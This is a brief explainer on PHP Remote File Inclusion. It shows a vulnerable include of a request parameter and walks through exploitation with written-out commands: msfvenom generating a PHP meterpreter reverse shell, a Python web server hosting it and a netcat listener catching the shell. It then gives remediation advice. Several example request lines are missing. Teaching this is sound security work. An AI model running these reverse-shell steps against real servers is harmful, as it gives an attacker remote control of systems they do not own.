tl;dr: Remote File Inclusion
What is it?
When a web app takes user-controlled input (eg a url query string parameter) and passes it to an
include command without sanitising it. The server then accesses the remote file which could be a reverse shell script or other malicious code.
May I see it?
$incfile = $_REQUEST["file"];
file parameter is taken from the query string and passed into an include command. If the following request is made:
the server will resolve it to:
and will run any code within the attacker’s script.
How can I exploit it?
So, the attacker could generate a php reverse shell payload like so:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
host the payload
python -m http.server 443
set up a netcat listener
nc -lvnp <port>
and make the http call above. If the server is vulnerable, it will call the attacker’s ip, download the shell and run it. Netcat will then catch the reverse shell.
How do I remediate it?
Create an allowlist of known, safe values for file inclusion and accept only those. You could map simple numerical inputs like
faq.txt and then reject all other values.
Create a denylist of known disallowed values.
Employ a specific naming scheme and check all provided values against it. Guard against double extensions such as
If feasible, use a jail or sandboxing strategy such as
chroot() to limit the locations that the process can access.